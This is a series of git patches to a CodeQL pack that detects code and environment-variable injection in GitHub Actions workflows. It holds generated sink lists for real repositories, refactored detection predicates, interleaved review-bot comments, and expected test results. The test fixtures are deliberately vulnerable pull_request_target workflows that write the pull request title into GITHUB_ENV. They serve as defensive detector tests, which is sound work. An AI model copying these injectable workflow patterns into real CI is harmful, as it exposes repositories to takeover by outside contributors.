@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.target", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.source", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.prerelease", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml new file mode 100644 index 00000000000..9e5f6e3541e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "inputs.config_file", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "inputs.test_environment", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-fast.yml", "*", "inputs.test_environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml new file mode 100644 index 00000000000..89fbb5dbf70 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "inputs.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml new file mode 100644 index 00000000000..26f9f659a2d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/container.yml", "*", "inputs.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file From 6c245605a754d5a43dafa11c4448b30a642e0d17 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:26:45 +0200 Subject: [PATCH 0165/1267] Discard already-modeled sinks --- ql/src/Security/CWE-020/CompositeActionsSinks.ql | 4 +++- ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql | 4 +++- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 54f58e6b63e..3ea9050c832 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql 
@@ -21,7 +21,9 @@ private module MyConfig implements DataFlow::ConfigSig { exists(CompositeAction c | c.getAnInput() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + } } module MyFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 2dd5bf1cfef..5f1c54e7003 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -21,7 +21,9 @@ private module MyConfig implements DataFlow::ConfigSig { exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + } } module MyFlow = TaintTracking::Global; From 1b2e02df64938e6edca0b98b0d34f86d094e4ab9 Mon Sep 17 00:00:00 2001 
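Review bot: The new `not externallyDefinedSink(sink, "code-injection")` conjunct in `isSink` has no comment saying why already-modeled sinks are dropped, and the same line is added to `ReusableWorkflowsSinks.ql` in the next hunk. I would put `// skip sinks that already have a sinkModel row, so only inputs that still need modeling are reported` above it in both files. That wording is inferred from the commit title, so confirm it matches the intent. The `MyConfig` module starts outside both hunks.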
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 15:18:09 +0200 Subject: [PATCH 0166/1267] Add support for multiline assigments --- ql/lib/codeql/actions/Ast.qll | 66 +++++++++++++++---- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 33 +++++++--- .../security/ArtifactPoisoningQuery.qll | 2 +- .../actions/security/EnvVarInjectionQuery.qll | 58 +++++++++------- .../.github/workflows/multiline.yml | 29 ++++++++ ql/test/library-tests/test.ql | 4 +- .../CWE-077/.github/workflows/test4.yml | 43 ++++++++++++ .../Security/CWE-077/EnvVarInjection.expected | 6 ++ .../PrivilegedEnvVarInjection.expected | 8 +++ .../Security/CWE-094/CodeInjection.expected | 4 +- .../CWE-094/PrivilegedCodeInjection.expected | 8 +-- .../.github/workflows/artifactpoisoning51.yml | 4 -- .../.github/workflows/artifactpoisoning52.yml | 27 ++++++++ .../.github/workflows/artifactpoisoning53.yml | 27 ++++++++ .../CWE-829/ArtifactPoisoning.expected | 2 + 15 files changed, 265 insertions(+), 56 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/multiline.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index bbf5c86fb95..cf5b63399f0 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -25,14 +25,17 @@ module Utils { } bindingset[line, var] - predicate extractAssignment(string line, string var, string key, string value) { + private predicate extractLineAssignment(string line, string var, string key, string value) { exists(string assignment | + // single line assignment assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + "(\\})?(\"|')?", 2) and + count(assignment.splitAt("=")) = 2 and key = trimQuotes(assignment.splitAt("=", 0)) and value = trimQuotes(assignment.splitAt("=", 1)) or + // workflow command assignment assignment = line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and 
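Review bot: The added `count(assignment.splitAt("=")) = 2` guard in `extractLineAssignment` rejects single-line writes whose value itself contains `=` (a URL with a query string, base64 padding), so those `GITHUB_ENV`/`GITHUB_OUTPUT` writes are no longer visible to the injection and flow predicates built on it. Since the aggregate counts distinct parts, a line such as `echo "a=a" >> $GITHUB_ENV` fails the guard as well. Splitting on the first `=` only avoids both while still rejecting lines with no `=`: `key = trimQuotes(assignment.regexpCapture("([^=]+)=(.*)", 1)) and value = trimQuotes(assignment.regexpCapture("([^=]+)=(.*)", 2))`. The workflow-command branch of the predicate continues in the following hunk.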
@@ -41,20 +44,59 @@ module Utils { ) } - predicate writeToGitHubEnv(Run run, string key, string value) { - exists(string script, string line | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "ENV", key, value) + bindingset[var] + private string multilineAssignmentRegex(string var) { + result = + ".*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" + } + + bindingset[var] + private string multilineBlockAssignmentRegex(string var) { + result = + ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" + } + + bindingset[script, var] + private predicate extractMultilineAssignment(string script, string var, string key, string value) { + // multiline assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) + ) + or + // multiline block assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) ) } + predicate writeToGitHubEnv(Run run, 
string key, string value) { + extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or + extractMultilineAssignment(run.getScript(), "ENV", key, value) + } + predicate writeToGitHubOutput(Run run, string key, string value) { - exists(string script, string line | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "OUTPUT", key, value) - ) + extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or + extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e66c8e7c1b9..48c40b6a72c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
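Review bot: Both `multilineAssignmentRegex` and `multilineBlockAssignmentRegex` fix the heredoc delimiter to `([A-Z]*)EOF`, so a multiline write that uses a lowercase or generated delimiter is not recognised and the sinks and taint steps built on `writeToGitHubEnv`/`writeToGitHubOutput` will not see it. The `multiline.yml` fixture added in this commit contains `echo "status<<$EOF"` cases that, as far as I can tell, this pattern cannot match. The opening and closing delimiter groups are also not tied to each other. At minimum record the limit above the helpers, e.g. `// NOTE: only heredoc delimiters of the form [A-Z]*EOF are recognised`; widening the pattern would need matching test expectations. The helpers are complete in this hunk, the enclosing `Utils` module is not.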
@@ -36,19 +36,36 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string output | - c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and + exists(Run run, string varName, string key, string value | + c = any(DataFlow::FieldContent ct | ct.getName() = key.replaceAll("output\\.", "")) and run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - exists(string script, string line | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "OUTPUT", output, _) and - line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 - ) and + Utils::writeToGitHubOutput(run, key, value) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and succ.asExpr() = run ) } +/** + * Holds if a Run step declares an environment variable, uses it in its script to set another env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "foo=$(echo $BODY)" >> $GITHUB_ENV + */ +predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string varName, string value | + run.getInScopeEnvVarExpr(varName) = pred.asExpr() and + Utils::writeToGitHubEnv(run, _, value) and + value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 and + succ.asExpr() = run + ) +} + +class EnvToRunTaintStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) } +} + /** * A downloaded artifact that gets assigned to a Run step output. * - uses: actions/download-artifact@v2 diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index c192974a12b..4a334f3440f 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
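Review bot: `envToRunStep` tests `value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0`, which excludes a reference at position 0, so a write whose value is just the variable (presumably `$BODY` after `trimQuotes` for `echo "FOO=$BODY" >> $GITHUB_ENV`) yields no taint step. `envToOutputStoreStep` in this same hunk uses `value.matches("%$" + ["", "{", "ENV{"] + varName + "%")`, which does cover that case. I would use one form in both, or change the comparison to `>= 0`. The same `indexOf(...) > 0` comparison appears in `envVarInjectionFromExprSink` and `envVarInjectionFromEnvSink` in the `EnvVarInjectionQuery.qll` hunk of this commit.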
+++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -250,7 +250,7 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { // eg: `echo "sha=$(> $GITHUB_ENV` Utils::writeToGitHubEnv(this, _, value) and // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index d216707ec86..edeea61a871 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
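Review bot: The command list in `EnvVarInjectionRunStep` gains `"ls\\s+"`, but the otherwise identical pattern in `envVarInjectionFromFileSink` (`EnvVarInjectionQuery.qll`, next hunk) still lists only `"cat\\s+"` and `"<"`, so the two checks now disagree on whether an `ls` substitution written to `GITHUB_ENV` after an artifact download counts. If that is not intended, moving the pattern into one shared predicate keeps them aligned. Because `regexpMatch` has to match the whole value, a substitution preceded by other text, such as `prefix-$(cat file)`, is also outside this check; a comment next to the existing TODO saying so would help. The enclosing class starts outside the hunk.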
@@ -5,35 +5,47 @@ import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow -class EnvVarInjectionFromExprSink extends DataFlow::Node { - EnvVarInjectionFromExprSink() { - exists(Expression expr, Run run, string script, string line, string key, string value | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "ENV", key, value) and - expr = this.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getRawExpression()) > 0 - ) - } +predicate envVarInjectionFromExprSink(DataFlow::Node sink) { + exists(Expression expr, Run run, string key, string value | + Utils::writeToGitHubEnv(run, key, value) and + expr = sink.asExpr() and + run.getAnScriptExpr() = expr and + value.indexOf(expr.getRawExpression()) > 0 + ) } -class EnvVarInjectionFromFileSink extends DataFlow::Node { - EnvVarInjectionFromFileSink() { - exists(Run run, ArtifactDownloadStep step, string value | - this.asExpr() = run and - step.getAFollowingStep() = run and - Utils::writeToGitHubEnv(run, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) - ) - } +predicate envVarInjectionFromFileSink(DataFlow::Node sink) { + exists(Run run, ArtifactDownloadStep step, string value | + sink.asExpr() = run and + step.getAFollowingStep() = run and + Utils::writeToGitHubEnv(run, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare a new env var. + * e.g. 
+ * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "foo=$(echo $BODY)" >> $GITHUB_ENV + */ +predicate envVarInjectionFromEnvSink(DataFlow::Node sink) { + exists(Run run, Expression expr, string varName, string value | + sink.asExpr().getInScopeEnvVarExpr(varName) = expr and + run = sink.asExpr() and + Utils::writeToGitHubEnv(run, _, value) and + value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 + ) } private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { - this instanceof EnvVarInjectionFromExprSink or - this instanceof EnvVarInjectionFromFileSink or + envVarInjectionFromExprSink(this) or + envVarInjectionFromFileSink(this) or + envVarInjectionFromEnvSink(this) or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/test/library-tests/.github/workflows/multiline.yml b/ql/test/library-tests/.github/workflows/multiline.yml new file mode 100644 index 00000000000..04468cb15a1 --- /dev/null +++ b/ql/test/library-tests/.github/workflows/multiline.yml @@ -0,0 +1,29 @@ +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Test: + runs-on: ubuntu-latest + steps: + run: | + echo "changelog<> $GITHUB_OUTPUT + echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT + echo "CHANGELOGEOF" >> $GITHUB_OUTPUT + run: | + EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64) + echo "status<<$EOF" >> $GITHUB_OUTPUT + echo "$(cat status.output.json)" >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + run: | + echo "response<<$EOF" >> $GITHUB_OUTPUT + echo $output >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 947757c8c3a..fa6c430e366 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql 
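Review bot: In `multiline.yml` the first three `run:` entries under `steps:` appear without the `- ` list marker that the last entry has, which would give the fixture repeated `run` keys instead of four steps, so those multiline cases may not be exercised by the library test. This is how the hunk reads here; if the file is really laid out that way, start each of them with `- run: |`.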
@@ -80,7 +80,7 @@ query predicate writeToGitHubEnv(string key, string value) { "echo 'sha2=$(> $GITHUB_ENV", "echo sha3=$(> $GITHUB_ENV", ] and - Utils::extractAssignment(t, "ENV", key, value) + Utils::extractLineAssignment(t, "ENV", key, value) ) } @@ -98,6 +98,6 @@ query predicate writeToGitHubOutput(string key, string value) { "echo sha5=$(> ${GITHUB_OUTPUT}", "echo sha6=$(> \"${GITHUB_OUTPUT}\"", ] and - Utils::extractAssignment(t, "OUTPUT", key, value) + Utils::extractLineAssignment(t, "OUTPUT", key, value) ) } diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml new file mode 100644 index 00000000000..7fb89591b11 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -0,0 +1,43 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE<> $GITHUB_ENV + echo "$TITLE" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV + - run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" + ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 0c4574a77cb..32379a7264f 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected 
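Review bot: Both `test.ql` hunks now call `Utils::extractLineAssignment`, but the `Ast.qll` hunk of this commit declares it as `private predicate extractLineAssignment`, so as far as these hunks show the test query cannot reference it from another file. Either drop `private` on that predicate, or have the test go through the public `Utils::writeToGitHubEnv` and `Utils::writeToGitHubOutput`; those take a `Run`, so the inline string list would have to become fixture steps. The two `query predicate` bodies start outside the hunks.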
@@ -3,6 +3,8 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -12,5 +14,9 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 6dbe7bf3c93..77db4c10344 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected 
@@ -3,6 +3,8 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -12,6 +14,10 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | 
@@ -19,3 +25,5 @@ subpaths | .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | +| .github/workflows/test4.yml:21:9:25:6 | Run Step | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:21:9:25:6 | Run Step | Run Step | +| .github/workflows/test4.yml:25:9:31:6 | Run Step | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:25:9:31:6 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index a300f4dd11e..bf515674d90 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -200,8 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index f025d13b1a9..6ba7a1c714a 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -200,8 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | 
